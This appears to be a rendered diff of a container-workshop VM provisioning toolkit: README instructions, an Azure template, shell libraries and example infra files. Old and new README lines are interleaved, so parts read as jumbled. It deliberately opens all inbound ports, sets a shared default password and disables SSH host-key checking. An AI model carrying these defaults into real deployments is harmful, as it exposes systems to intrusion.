- run `./workshopctl kube` (if you want to install and set up Kubernetes)
- run `./workshopctl cards` (if you want to generate a PDF handout with each user's host IPs and login info)
- run `./workshopctl stop` at the end of the workshop to terminate instances (a condensed example session is sketched below)
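
A condensed session, with placeholder file names and a placeholder `TAG` (the
actual tag is generated by `start` and shown in its output), might look like this:

```bash
cp infra/example.aws infra/aws-us-east-1          # hypothetical infra file name
cp settings/example.yaml settings/myworkshop.yaml # hypothetical settings file name
ulimit -Sn 10000
./workshopctl start --infra infra/aws-us-east-1 --settings settings/myworkshop.yaml --count 20
./workshopctl deploy TAG
./workshopctl kube TAG
./workshopctl cards TAG
./workshopctl stop TAG
```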

## Clone/Fork the Repo, and Build the Tools Image

The Docker Compose file here is used to build an image with all the dependencies to run the `./workshopctl` commands and optional tools. Each run of the script will check if you have those dependencies locally on your host, and will only use the container if you're [missing a dependency](workshopctl#L5).

    $ git clone https://github.com/jpetazzo/container.training
    $ cd container.training/prepare-vms
    $ docker-compose build
    $ ./trainer <commands> # See "Summary of commands" section below

## 3. Preparing the environment

Required environment variables:
## Preparing to Run `./workshopctl`

* `AWS_ACCESS_KEY_ID`
* `AWS_SECRET_ACCESS_KEY`
* `AWS_DEFAULT_REGION`
### Required AWS Permissions/Info

### 4. Update settings.yaml
- Initial assumptions are that you're using a root account. If you'd like to use an IAM user, it will need `AmazonEC2FullAccess` and `IAMReadOnlyAccess`.
- Using a non-default VPC or Security Group isn't supported out of the box yet, so you will have to customize `lib/commands.sh` if you want to change that.
- These instances will be assigned the default VPC Security Group, which does not open any ports from the Internet by default. So you'll need to add Inbound rules for `SSH | TCP | 22 | 0.0.0.0/0` and `Custom TCP Rule | TCP | 8000 - 8002 | 0.0.0.0/0`, or run `./workshopctl opensg`, which opens up all ports.

Then pass `settings/YOUR_WORKSHOP_NAME-settings.yaml` as an argument to `deploy`, `cards`, etc.
### Create your `infra` file

## Usage
You need to do this only once. (On AWS, you can create one `infra`
file per region.)

### Summary of commands
Make a copy of one of the example files in the `infra` directory.

The `trainer` script can be executed directly.
For instance:

Summary of steps to launch a batch of instances for a workshop:
```bash
cp infra/example.aws infra/aws-us-west-2
```

* Export the environment variables needed by the AWS CLI (see **2. Preparing the environment** above)
* `./trainer start N` (where `N` is the number of AWS instances to create)
* `./trainer list` to view the list of tags
* `./trainer list TAG` to view the instances with a given `TAG`
* `./trainer deploy TAG settings/somefile.yaml` to run `scripts/postprep.rc` via parallel-ssh
* `./trainer pull-images TAG` to pre-pull a bunch of Docker images to the instances
* `./trainer test TAG`
* `./trainer cards TAG settings/somefile.yaml` to generate a PDF and an HTML file you can print and cut to hand out cards with connection information to attendees
Edit your infrastructure file to customize it.
You will probably need to put your cloud provider credentials,
select a region...

`./trainer` will run locally if all its dependencies are fulfilled; otherwise it will run in a Docker container.
If you don't have the `aws` CLI installed, you will get a warning that it's a missing dependency. If you're not using AWS, you can ignore this.

It will check for the necessary environment variables. Then, if all its dependencies are installed
locally, it will execute `trainer-cli`. If not, it will look for a local Docker image
tagged `preparevms_prepare-vms` (created automatically when you run `docker-compose build`).
If found, it will run in a container. If not found, the user will be prompted to
either install the missing dependencies or run `docker-compose build`.
### Create your `settings` file

## Detailed usage
Similarly, pick one of the files in `settings` and copy it
to customize it.

### Start some VMs
For instance:

    $ ./trainer start 10
```bash
cp settings/example.yaml settings/myworkshop.yaml
```

A few things will happen:
You're all set!

* Your local SSH key will be synced
* AWS instances will be created and tagged
* A directory will be created
## `./workshopctl` Usage

Details below.
```
workshopctl - the orchestration workshop swiss army knife
Commands:
ami           Show the AMI that will be used for deployment
amis          List Ubuntu AMIs in the current region
build         Build the Docker image to run this program in a container
cards         Generate ready-to-print cards for a group of VMs
deploy        Install Docker on a bunch of running VMs
ec2quotas     Check our EC2 quotas (max instances)
help          Show available commands
ids           List the instance IDs belonging to a given tag or token
ips           List the IP addresses of the VMs for a given tag or token
kube          Setup kubernetes clusters with kubeadm (must be run AFTER deploy)
kubetest      Check that all nodes are reporting as Ready
list          List available groups in the current region
opensg        Open the default security group to ALL ingress traffic
pull_images   Pre-pull a bunch of Docker images
retag         Apply a new tag to a group of VMs
start         Start a group of VMs
status        List instance status for a given group
stop          Stop (terminate, shutdown, kill, remove, destroy...) instances
test          Run tests (pre-flight checks) on a group of VMs
wrap          Run this program in a container
```

### Summary of What `./workshopctl` Does For You

- Used to manage bulk AWS instances for you without needing to use the AWS CLI or GUI.
- Can manage multiple "tags" or groups of instances, which are tracked in `prepare-vms/tags/`.
- Can also create PDF/HTML for printing student info with instance IPs and logins.
- The `./workshopctl` script can be executed directly.
- It will run locally if all its dependencies are fulfilled; otherwise it will run in the Docker container you created with `docker-compose build` (`preparevms_prepare-vms`).
- During `start` it will add your default local SSH key to all instances under the `ubuntu` user.
- During `deploy` it will create the `docker` user with password `training`, which is printed on the cards for students. This can be configured with the `docker_user_password` property in the settings file.

### Example Steps to Launch a Group of AWS Instances for a Workshop

- Run `./workshopctl start --infra infra/aws-us-east-2 --settings settings/myworkshop.yaml --count 60` to create 60 EC2 instances
  - Your local SSH key will be synced to instances under the `ubuntu` user
  - AWS instances will be created and tagged based on date, and IPs stored in `prepare-vms/tags/`
- Run `./workshopctl deploy TAG` to run `lib/postprep.py` via parallel-ssh
  - If it errors or times out, you should be able to rerun it
  - This requires a good connection to run all the parallel SSH connections, up to 100 in parallel (ProTip: create a dedicated management instance in the same AWS region where you run all these utils from)
- Run `./workshopctl pull_images TAG` to pre-pull a bunch of Docker images to the instances
- Run `./workshopctl cards TAG` to generate PDF/HTML files to print, cut, and hand out to students
- *Have a great workshop*
- Run `./workshopctl stop TAG` to terminate instances.

### Example Steps to Launch Azure Instances

- Install the [Azure CLI](https://docs.microsoft.com/en-us/cli/azure/install-azure-cli?view=azure-cli-latest) and authenticate with a valid account (`az login`)
- Customize `azuredeploy.parameters.json`
  - Required:
    - Provide the SSH public key you plan to use for instance configuration
  - Optional:
    - Choose a name for the workshop (default is "workshop")
    - Choose the number of instances (default is 3)
    - Customize the desired instance size (default is Standard_D1_v2)
- Launch instances with your chosen resource group name and your preferred region; the examples are "workshop" and "eastus":

```
az group create --name workshop --location eastus
az group deployment create --resource-group workshop --template-file azuredeploy.json --parameters @azuredeploy.parameters.json
```

The `az group deployment create` command can take several minutes and will only say `- Running ..` until it completes, unless you increase the verbosity with `--verbose` or `--debug`.

To display the IPs of the instances you've launched:

```
az vm list-ip-addresses --resource-group workshop --output table
```

If you want to put the IPs into `prepare-vms/tags/<tag>/ips.txt` for a tag of "myworkshop":

1) If you haven't yet installed `jq` and/or created your event's tags directory in `prepare-vms`:

```
brew install jq
mkdir -p tags/myworkshop
```

2) And then generate the IP list:

```
az vm list-ip-addresses --resource-group workshop --output json | jq -r '.[].virtualMachine.network.publicIpAddresses[].ipAddress' > tags/myworkshop/ips.txt
```

After the workshop is over, remove the instances:

```
az group delete --resource-group workshop
```

### Example Steps to Configure Instances from a non-AWS Source

- Copy `infra/example.generic` to `infra/generic`
- Run `./workshopctl start --infra infra/generic --settings settings/...yaml`
- Note the `prepare-vms/tags/TAG/` path that has been auto-created.
- Launch instances via your preferred method. You'll need to get the instance IPs and be able to SSH into them.
- Edit the file `prepare-vms/tags/TAG/ips.txt`; it should list the IP addresses of the VMs (one per line, without any comments or other info; see the example after this list)
- Continue deployment of the cluster configuration with `./workshopctl deploy TAG`
- Optionally, configure Kubernetes clusters of the size given in the settings: `./workshopctl kube TAG`
- Optionally, test your Kubernetes clusters (they may take a little time to become ready): `./workshopctl kubetest TAG`
- Generate cards to print and hand out: `./workshopctl cards TAG`
- Print the cards file: `prepare-vms/tags/TAG/ips.html`
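
A minimal `ips.txt` might look like this (example addresses from a documentation range):

```
203.0.113.10
203.0.113.11
203.0.113.12
```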


## Even More Details

#### Sync of SSH keys

@@ -71,7 +201,7 @@ To see which local key will be uploaded, run `ssh-add -l | grep RSA`.

#### Instance + tag creation

10 VMs will be started, with an automatically generated tag (timestamp + your username).
The VMs will be started, with an automatically generated tag (timestamp + your username).

Your SSH key will be added to the `authorized_keys` of the ubuntu user.

@@ -79,41 +209,39 @@ Your SSH key will be added to the `authorized_keys` of the ubuntu user.

Following the creation of the VMs, a text file will be created containing a list of their IPs.

This `ips.txt` file will be created in the `$TAG/` directory, and a symlink will be placed in the working directory of the script.

If you create new VMs, the symlinked file will be overwritten.

## Deployment
#### Deployment

Instances can be deployed manually using the `deploy` command:

    $ ./trainer deploy TAG settings/somefile.yaml
    $ ./workshopctl deploy TAG

The `postprep.rc` file will be copied via parallel-ssh to all of the VMs and executed.
The `postprep.py` file will be copied via parallel-ssh to all of the VMs and executed.

### Pre-pull images
#### Pre-pull images

    $ ./trainer pull-images TAG
    $ ./workshopctl pull_images TAG

### Generate cards
#### Generate cards

    $ ./trainer cards TAG settings/somefile.yaml
    $ ./workshopctl cards TAG

### List tags
If you want to generate both HTML and PDF cards, install [wkhtmltopdf](https://wkhtmltopdf.org/downloads.html); without that installed, only HTML cards will be generated.

    $ ./trainer list
If you don't have `wkhtmltopdf` installed, you will get a warning that it is a missing dependency. If you plan to just print the HTML cards, you can ignore this.

### List VMs
#### List tags

    $ ./trainer list TAG
    $ ./workshopctl list infra/some-infra-file

This will print a human-friendly list containing some information about each instance.
    $ ./workshopctl listall

### Stop and destroy VMs
    $ ./workshopctl tags

    $ ./trainer stop TAG
#### Stop and destroy VMs

    $ ./workshopctl stop TAG

## ToDo

* Don't write to bash history in system() in postprep
* compose, etc. version inconsistent (int vs str)
- Don't write to bash history in system() in postprep
- compose, etc. version inconsistent (int vs str)

prepare-vms/azuredeploy.json (new file, 250 lines)
@@ -0,0 +1,250 @@
{
  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "workshopName": {
      "type": "string",
      "defaultValue": "workshop",
      "metadata": {
        "description": "Workshop name."
      }
    },
    "vmPrefix": {
      "type": "string",
      "defaultValue": "node",
      "metadata": {
        "description": "Prefix for VM names."
      }
    },
    "numberOfInstances": {
      "type": "int",
      "defaultValue": 3,
      "metadata": {
        "description": "Number of VMs to create."
      }
    },
    "adminUsername": {
      "type": "string",
      "defaultValue": "ubuntu",
      "metadata": {
        "description": "Admin username for VMs."
      }
    },
    "sshKeyData": {
      "type": "string",
      "defaultValue": "",
      "metadata": {
        "description": "SSH rsa public key file as a string."
      }
    },
    "imagePublisher": {
      "type": "string",
      "defaultValue": "Canonical",
      "metadata": {
        "description": "OS image publisher; default Canonical."
      }
    },
    "imageOffer": {
      "type": "string",
      "defaultValue": "UbuntuServer",
      "metadata": {
        "description": "The name of the image offer. The default is Ubuntu"
      }
    },
    "imageSKU": {
      "type": "string",
      "defaultValue": "16.04-LTS",
      "metadata": {
        "description": "Version of the image. The default is 16.04-LTS"
      }
    },
    "vmSize": {
      "type": "string",
      "defaultValue": "Standard_D1_v2",
      "metadata": {
        "description": "VM Size."
      }
    }
  },
  "variables": {
    "vnetID": "[resourceId('Microsoft.Network/virtualNetworks',variables('virtualNetworkName'))]",
    "subnet1Ref": "[concat(variables('vnetID'),'/subnets/',variables('subnet1Name'))]",
    "vmName": "[parameters('vmPrefix')]",
    "sshKeyPath": "[concat('/home/',parameters('adminUsername'),'/.ssh/authorized_keys')]",
    "publicIPAddressName": "PublicIP",
    "publicIPAddressType": "Dynamic",
    "virtualNetworkName": "MyVNET",
    "netSecurityGroup": "MyNSG",
    "addressPrefix": "10.0.0.0/16",
    "subnet1Name": "subnet-1",
    "subnet1Prefix": "10.0.0.0/24",
    "nicName": "myVMNic"
  },
  "resources": [
    {
      "apiVersion": "2017-11-01",
      "type": "Microsoft.Network/publicIPAddresses",
      "name": "[concat(variables('publicIPAddressName'),copyIndex(1))]",
      "location": "[resourceGroup().location]",
      "copy": {
        "name": "publicIPLoop",
        "count": "[parameters('numberOfInstances')]"
      },
      "properties": {
        "publicIPAllocationMethod": "[variables('publicIPAddressType')]"
      },
      "tags": {
        "workshop": "[parameters('workshopName')]"
      }
    },
    {
      "apiVersion": "2017-11-01",
      "type": "Microsoft.Network/virtualNetworks",
      "name": "[variables('virtualNetworkName')]",
      "location": "[resourceGroup().location]",
      "dependsOn": [
        "[concat('Microsoft.Network/networkSecurityGroups/', variables('netSecurityGroup'))]"
      ],
      "properties": {
        "addressSpace": {
          "addressPrefixes": [
            "[variables('addressPrefix')]"
          ]
        },
        "subnets": [
          {
            "name": "[variables('subnet1Name')]",
            "properties": {
              "addressPrefix": "[variables('subnet1Prefix')]",
              "networkSecurityGroup": {
                "id": "[resourceId('Microsoft.Network/networkSecurityGroups', variables('netSecurityGroup'))]"
              }
            }
          }
        ]
      },
      "tags": {
        "workshop": "[parameters('workshopName')]"
      }
    },
    {
      "apiVersion": "2017-11-01",
      "type": "Microsoft.Network/networkInterfaces",
      "name": "[concat(variables('nicName'),copyIndex(1))]",
      "location": "[resourceGroup().location]",
      "copy": {
        "name": "nicLoop",
        "count": "[parameters('numberOfInstances')]"
      },
      "dependsOn": [
        "[concat('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'),copyIndex(1))]",
        "[concat('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]"
      ],
      "properties": {
        "ipConfigurations": [
          {
            "name": "ipconfig1",
            "properties": {
              "privateIPAllocationMethod": "Dynamic",
              "publicIPAddress": {
                "id": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'), copyIndex(1)))]"
              },
              "subnet": {
                "id": "[variables('subnet1Ref')]"
              }
            }
          }
        ]
      },
      "tags": {
        "workshop": "[parameters('workshopName')]"
      }
    },
    {
      "apiVersion": "2017-12-01",
      "type": "Microsoft.Compute/virtualMachines",
      "name": "[concat(variables('vmName'),copyIndex(1))]",
      "location": "[resourceGroup().location]",
      "copy": {
        "name": "vmLoop",
        "count": "[parameters('numberOfInstances')]"
      },
      "dependsOn": [
        "[concat('Microsoft.Network/networkInterfaces/', variables('nicName'), copyIndex(1))]"
      ],
      "properties": {
        "hardwareProfile": {
          "vmSize": "[parameters('vmSize')]"
        },
        "osProfile": {
          "computerName": "[concat(variables('vmName'),copyIndex(1))]",
          "adminUsername": "[parameters('adminUsername')]",
          "linuxConfiguration": {
            "disablePasswordAuthentication": true,
            "ssh": {
              "publicKeys": [
                {
                  "path": "[variables('sshKeyPath')]",
                  "keyData": "[parameters('sshKeyData')]"
                }
              ]
            }
          }
        },
        "storageProfile": {
          "osDisk": {
            "createOption": "FromImage"
          },
          "imageReference": {
            "publisher": "[parameters('imagePublisher')]",
            "offer": "[parameters('imageOffer')]",
            "sku": "[parameters('imageSKU')]",
            "version": "latest"
          }
        },
        "networkProfile": {
          "networkInterfaces": [
            {
              "id": "[resourceId('Microsoft.Network/networkInterfaces', concat(variables('nicName'),copyIndex(1)))]"
            }
          ]
        }
      },
      "tags": {
        "workshop": "[parameters('workshopName')]"
      }
    },
    {
      "apiVersion": "2017-11-01",
      "type": "Microsoft.Network/networkSecurityGroups",
      "name": "[variables('netSecurityGroup')]",
      "location": "[resourceGroup().location]",
      "tags": {
        "workshop": "[parameters('workshopName')]"
      },
      "properties": {
        "securityRules": [
          {
            "name": "default-open-ports",
            "properties": {
              "protocol": "Tcp",
              "sourcePortRange": "*",
              "destinationPortRange": "*",
              "sourceAddressPrefix": "*",
              "destinationAddressPrefix": "*",
              "access": "Allow",
              "priority": 1000,
              "direction": "Inbound"
            }
          }
        ]
      }
    }
  ],
  "outputs": {
    "resourceID": {
      "type": "string",
      "value": "[resourceId('Microsoft.Network/publicIPAddresses', concat(variables('publicIPAddressName'),'1'))]"
    }
  }
}

prepare-vms/azuredeploy.parameters.json (new file, 18 lines)
@@ -0,0 +1,18 @@
{
  "$schema": "http://schema.management.azure.com/schemas/2015-01-01/deploymentParameters.json#",
  "contentVersion": "1.0.0.0",
  "parameters": {
    "sshKeyData": {
      "value": "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDXTIl/M9oeSlcsC5Rfe+nZr4Jc4sl200pSw2lpdxlZ3xzeP15NgSSMJnigUrKUXHfqRQ+2wiPxEf0Odz2GdvmXvR0xodayoOQsO24AoERjeSBXCwqITsfp1bGKzMb30/3ojRBo6LBR6r1+lzJYnNCGkT+IQwLzRIpm0LCNz1j08PUI2aZ04+mcDANvHuN/hwi/THbLLp6SNWN43m9r02RcC6xlCNEhJi4wk4VzMzVbSv9RlLGST2ocbUHwmQ2k9OUmpzoOx73aQi9XNnEaFh2w/eIdXM75VtkT3mRryyykg9y0/hH8/MVmIuRIdzxHQqlm++DLXVH5Ctw6a4kS+ki7 workshop"
    },
    "workshopName": {
      "value": "workshop"
    },
    "numberOfInstances": {
      "value": 3
    },
    "vmSize": {
      "value": "Standard_D1_v2"
    }
  }
}

prepare-vms/cncsetup.sh (new file, 12 lines)
@@ -0,0 +1,12 @@
#!/bin/sh
if [ $(whoami) != ubuntu ]; then
  echo "This script should be executed on a freshly deployed node,"
  echo "with the 'ubuntu' user. Aborting."
  exit 1
fi
if id docker; then
  sudo userdel -r docker
fi
sudo apt-get update -q
sudo apt-get install -qy jq python-pip wkhtmltopdf xvfb
pip install --user awscli jinja2 pdfkit pssh

@@ -1,26 +1,19 @@
version: "2"

services:
  prepare-vms:
  workshopctl:
    build: .
    container_name: prepare-vms
    image: workshopctl
    working_dir: /root/prepare-vms
    volumes:
      - $HOME/.aws/:/root/.aws/
      - /etc/localtime:/etc/localtime:ro
      - /tmp/.X11-unix:/tmp/.X11-unix
      - $SSH_AUTH_DIRNAME:$SSH_AUTH_DIRNAME
      - $SSH_AUTH_SOCK:$SSH_AUTH_SOCK
      - $PWD/:/root/prepare-vms/
    environment:
      SCRIPT_DIR: /root/prepare-vms
      DISPLAY: ${DISPLAY}
      SSH_AUTH_SOCK: ${SSH_AUTH_SOCK}
      SSH_AGENT_PID: ${SSH_AGENT_PID}
      AWS_ACCESS_KEY_ID: ${AWS_ACCESS_KEY_ID}
      AWS_SECRET_ACCESS_KEY: ${AWS_SECRET_ACCESS_KEY}
      AWS_DEFAULT_REGION: ${AWS_DEFAULT_REGION}
      AWS_DEFAULT_OUTPUT: json
      AWS_INSTANCE_TYPE: ${AWS_INSTANCE_TYPE}
      AWS_VPC_ID: ${AWS_VPC_ID}
      USER: ${USER}
    entrypoint: /root/prepare-vms/scripts/trainer-cli
    entrypoint: /root/prepare-vms/workshopctl

prepare-vms/docker.png (binary file, 127 KiB, not shown)

prepare-vms/infra/example.aws (new file, 6 lines)
@@ -0,0 +1,6 @@
INFRACLASS=aws
# If you are using AWS to deploy, copy this file (e.g. to "aws", or "us-east-1")
# and customize the variables below.
export AWS_DEFAULT_REGION=us-east-1
export AWS_ACCESS_KEY_ID=AKI...
export AWS_SECRET_ACCESS_KEY=...

prepare-vms/infra/example.generic (new file, 2 lines)
@@ -0,0 +1,2 @@
INFRACLASS=generic
# This is for manual provisioning. No other variable or configuration is needed.

prepare-vms/infra/example.openstack (new file, 9 lines)
@@ -0,0 +1,9 @@
INFRACLASS=openstack
# If you are using OpenStack, copy this file (e.g. to "openstack" or "enix")
# and customize the variables below.
export TF_VAR_user="jpetazzo"
export TF_VAR_tenant="training"
export TF_VAR_domain="Default"
export TF_VAR_password="..."
export TF_VAR_auth_url="https://api.r1.nxs.enix.io/v3"
export TF_VAR_flavor="GP1.S"

prepare-vms/lib/cli.sh (new file, 90 lines)
@@ -0,0 +1,90 @@
# Abort if any error happens, and show the command that caused the error.
_ERR() {
    error "Command $BASH_COMMAND failed (exit status: $?)"
}
set -eE
trap _ERR ERR

die() {
    if [ -n "$1" ]; then
        error "$1"
    fi
    exit 1
}

error() {
    >/dev/stderr echo "[$(red ERROR)] $1"
}

warning() {
    >/dev/stderr echo "[$(yellow WARNING)] $1"
}

info() {
    >/dev/stderr echo "[$(green INFO)] $1"
}

# Print a full-width separator.
# If given an argument, will print it in the middle of that separator.
# If the argument is longer than the screen width, it will be printed between two separator lines.
sep() {
    if [ -z "$COLUMNS" ]; then
        COLUMNS=80
    fi
    SEP=$(yes = | tr -d "\n" | head -c $(($COLUMNS - 1)))
    if [ -z "$1" ]; then
        >/dev/stderr echo $SEP
    else
        MSGLEN=$(echo "$1" | wc -c)
        if [ $(($MSGLEN + 4)) -gt $COLUMNS ]; then
            >/dev/stderr echo "$SEP"
            >/dev/stderr echo "$1"
            >/dev/stderr echo "$SEP"
        else
            LEFTLEN=$((($COLUMNS - $MSGLEN - 2) / 2))
            RIGHTLEN=$(($COLUMNS - $MSGLEN - 2 - $LEFTLEN))
            LEFTSEP=$(echo $SEP | head -c $LEFTLEN)
            RIGHTSEP=$(echo $SEP | head -c $RIGHTLEN)
            >/dev/stderr echo "$LEFTSEP $1 $RIGHTSEP"
        fi
    fi
}

need_infra() {
    if [ -z "$1" ]; then
        die "Please specify infrastructure file. (e.g.: infra/aws)"
    fi
    if [ "$1" = "--infra" ]; then
        die "The infrastructure file should be passed directly to this command. Remove '--infra' and try again."
    fi
    if [ ! -f "$1" ]; then
        die "Infrastructure file $1 doesn't exist."
    fi
    . "$1"
    . "lib/infra/$INFRACLASS.sh"
}

need_tag() {
    if [ -z "$TAG" ]; then
        die "Please specify a tag or token. To see available tags and tokens, run: $0 list"
    fi
    if [ ! -d "tags/$TAG" ]; then
        die "Tag $TAG not found (directory tags/$TAG does not exist)."
    fi
    for FILE in settings.yaml ips.txt infra.sh; do
        if [ ! -f "tags/$TAG/$FILE" ]; then
            warning "File tags/$TAG/$FILE not found."
        fi
    done
    . "tags/$TAG/infra.sh"
    . "lib/infra/$INFRACLASS.sh"
}

need_settings() {
    if [ -z "$1" ]; then
        die "Please specify a settings file. (e.g.: settings/kube101.yaml)"
    fi
    if [ ! -f "$1" ]; then
        die "Settings file $1 doesn't exist."
    fi
}

prepare-vms/lib/colors.sh (new file, 15 lines)
@@ -0,0 +1,15 @@
bold() {
    echo "$(tput bold)$1$(tput sgr0)"
}

red() {
    echo "$(tput setaf 1)$1$(tput sgr0)"
}

green() {
    echo "$(tput setaf 2)$1$(tput sgr0)"
}

yellow() {
    echo "$(tput setaf 3)$1$(tput sgr0)"
}
695
prepare-vms/lib/commands.sh
Normal file
695
prepare-vms/lib/commands.sh
Normal file
@@ -0,0 +1,695 @@
|
||||
export AWS_DEFAULT_OUTPUT=text
|
||||
|
||||
HELP=""
|
||||
_cmd() {
|
||||
HELP="$(printf "%s\n%-20s %s\n" "$HELP" "$1" "$2")"
|
||||
}
|
||||
|
||||
_cmd help "Show available commands"
|
||||
_cmd_help() {
|
||||
printf "$(basename $0) - the container training swiss army knife\n"
|
||||
printf "Commands:"
|
||||
printf "%s" "$HELP" | sort
|
||||
}
|
||||
|
||||
_cmd build "Build the Docker image to run this program in a container"
|
||||
_cmd_build() {
|
||||
docker-compose build
|
||||
}
|
||||
|
||||
_cmd wrap "Run this program in a container"
|
||||
_cmd_wrap() {
|
||||
docker-compose run --rm workshopctl "$@"
|
||||
}
|
||||
|
||||
_cmd cards "Generate ready-to-print cards for a group of VMs"
|
||||
_cmd_cards() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# This will process ips.txt to generate two files: ips.pdf and ips.html
|
||||
(
|
||||
cd tags/$TAG
|
||||
../../lib/ips-txt-to-html.py settings.yaml
|
||||
)
|
||||
|
||||
info "Cards created. You can view them with:"
|
||||
info "xdg-open tags/$TAG/ips.html tags/$TAG/ips.pdf (on Linux)"
|
||||
info "open tags/$TAG/ips.html (on macOS)"
|
||||
}
|
||||
|
||||
_cmd deploy "Install Docker on a bunch of running VMs"
|
||||
_cmd_deploy() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# wait until all hosts are reachable before trying to deploy
|
||||
info "Trying to reach $TAG instances..."
|
||||
while ! tag_is_reachable; do
|
||||
>/dev/stderr echo -n "."
|
||||
sleep 2
|
||||
done
|
||||
>/dev/stderr echo ""
|
||||
|
||||
echo deploying > tags/$TAG/status
|
||||
sep "Deploying tag $TAG"
|
||||
|
||||
# Wait for cloudinit to be done
|
||||
pssh "
|
||||
while [ ! -f /var/lib/cloud/instance/boot-finished ]; do
|
||||
sleep 1
|
||||
done"
|
||||
|
||||
# Copy settings and install Python YAML parser
|
||||
pssh -I tee /tmp/settings.yaml <tags/$TAG/settings.yaml
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install -y python-yaml"
|
||||
|
||||
# Copy postprep.py to the remote machines, and execute it, feeding it the list of IP addresses
|
||||
pssh -I tee /tmp/postprep.py <lib/postprep.py
|
||||
pssh --timeout 900 --send-input "python /tmp/postprep.py >>/tmp/pp.out 2>>/tmp/pp.err" <tags/$TAG/ips.txt
|
||||
|
||||
# Install docker-prompt script
|
||||
pssh -I sudo tee /usr/local/bin/docker-prompt <lib/docker-prompt
|
||||
pssh sudo chmod +x /usr/local/bin/docker-prompt
|
||||
|
||||
# If /home/docker/.ssh/id_rsa doesn't exist, copy it from the first node
|
||||
pssh "
|
||||
sudo -u docker [ -f /home/docker/.ssh/id_rsa ] ||
|
||||
ssh -o StrictHostKeyChecking=no \$(cat /etc/name_of_first_node) sudo -u docker tar -C /home/docker -cvf- .ssh |
|
||||
sudo -u docker tar -C /home/docker -xf-"
|
||||
|
||||
# if 'docker@' doesn't appear in /home/docker/.ssh/authorized_keys, copy it there
|
||||
pssh "
|
||||
grep docker@ /home/docker/.ssh/authorized_keys ||
|
||||
cat /home/docker/.ssh/id_rsa.pub |
|
||||
sudo -u docker tee -a /home/docker/.ssh/authorized_keys"
|
||||
|
||||
# On the first node, create and deploy TLS certs using Docker Machine
|
||||
# (Currently disabled.)
|
||||
true || pssh "
|
||||
if i_am_first_node; then
|
||||
grep '[0-9]\$' /etc/hosts |
|
||||
xargs -n2 sudo -H -u docker \
|
||||
docker-machine create -d generic --generic-ssh-user docker --generic-ip-address
|
||||
fi"
|
||||
|
||||
sep "Deployed tag $TAG"
|
||||
echo deployed > tags/$TAG/status
|
||||
info "You may want to run one of the following commands:"
|
||||
info "$0 kube $TAG"
|
||||
info "$0 pull_images $TAG"
|
||||
info "$0 cards $TAG"
|
||||
}
|
||||
|
||||
_cmd disabledocker "Stop Docker Engine and don't restart it automatically"
|
||||
_cmd_disabledocker() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "sudo systemctl disable docker.service"
|
||||
pssh "sudo systemctl disable docker.socket"
|
||||
pssh "sudo systemctl stop docker"
|
||||
}
|
||||
|
||||
_cmd kubebins "Install Kubernetes and CNI binaries but don't start anything"
|
||||
_cmd_kubebins() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh --timeout 300 "
|
||||
set -e
|
||||
cd /usr/local/bin
|
||||
if ! [ -x etcd ]; then
|
||||
curl -L https://github.com/etcd-io/etcd/releases/download/v3.3.10/etcd-v3.3.10-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=1 --wildcards -zx '*/etcd' '*/etcdctl'
|
||||
fi
|
||||
if ! [ -x hyperkube ]; then
|
||||
curl -L https://dl.k8s.io/v1.14.1/kubernetes-server-linux-amd64.tar.gz \
|
||||
| sudo tar --strip-components=3 -zx kubernetes/server/bin/hyperkube
|
||||
fi
|
||||
if ! [ -x kubelet ]; then
|
||||
for BINARY in kubectl kube-apiserver kube-scheduler kube-controller-manager kubelet kube-proxy;
|
||||
do
|
||||
sudo ln -s hyperkube \$BINARY
|
||||
done
|
||||
fi
|
||||
sudo mkdir -p /opt/cni/bin
|
||||
cd /opt/cni/bin
|
||||
if ! [ -x bridge ]; then
|
||||
curl -L https://github.com/containernetworking/plugins/releases/download/v0.7.5/cni-plugins-amd64-v0.7.5.tgz \
|
||||
| sudo tar -zx
|
||||
fi
|
||||
"
|
||||
}
|
||||
|
||||
_cmd kube "Setup kubernetes clusters with kubeadm (must be run AFTER deploy)"
|
||||
_cmd_kube() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
# Optional version, e.g. 1.13.5
|
||||
KUBEVERSION=$2
|
||||
if [ "$KUBEVERSION" ]; then
|
||||
EXTRA_KUBELET="=$KUBEVERSION-00"
|
||||
EXTRA_KUBEADM="--kubernetes-version=v$KUBEVERSION"
|
||||
else
|
||||
EXTRA_KUBELET=""
|
||||
EXTRA_KUBEADM=""
|
||||
fi
|
||||
|
||||
# Install packages
|
||||
pssh --timeout 200 "
|
||||
curl -s https://packages.cloud.google.com/apt/doc/apt-key.gpg |
|
||||
sudo apt-key add - &&
|
||||
echo deb http://apt.kubernetes.io/ kubernetes-xenial main |
|
||||
sudo tee /etc/apt/sources.list.d/kubernetes.list"
|
||||
pssh --timeout 200 "
|
||||
sudo apt-get update -q &&
|
||||
sudo apt-get install -qy kubelet$EXTRA_KUBELET kubeadm kubectl &&
|
||||
kubectl completion bash | sudo tee /etc/bash_completion.d/kubectl"
|
||||
|
||||
# Initialize kube master
|
||||
pssh --timeout 200 "
|
||||
if i_am_first_node && [ ! -f /etc/kubernetes/admin.conf ]; then
|
||||
kubeadm token generate > /tmp/token &&
|
||||
sudo kubeadm init $EXTRA_KUBEADM --token \$(cat /tmp/token) --apiserver-cert-extra-sans \$(cat /tmp/ipv4)
|
||||
fi"
|
||||
|
||||
# Put kubeconfig in ubuntu's and docker's accounts
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
sudo mkdir -p \$HOME/.kube /home/docker/.kube &&
|
||||
sudo cp /etc/kubernetes/admin.conf \$HOME/.kube/config &&
|
||||
sudo cp /etc/kubernetes/admin.conf /home/docker/.kube/config &&
|
||||
sudo chown -R \$(id -u) \$HOME/.kube &&
|
||||
sudo chown -R docker /home/docker/.kube
|
||||
fi"
|
||||
|
||||
# Install weave as the pod network
|
||||
pssh "
|
||||
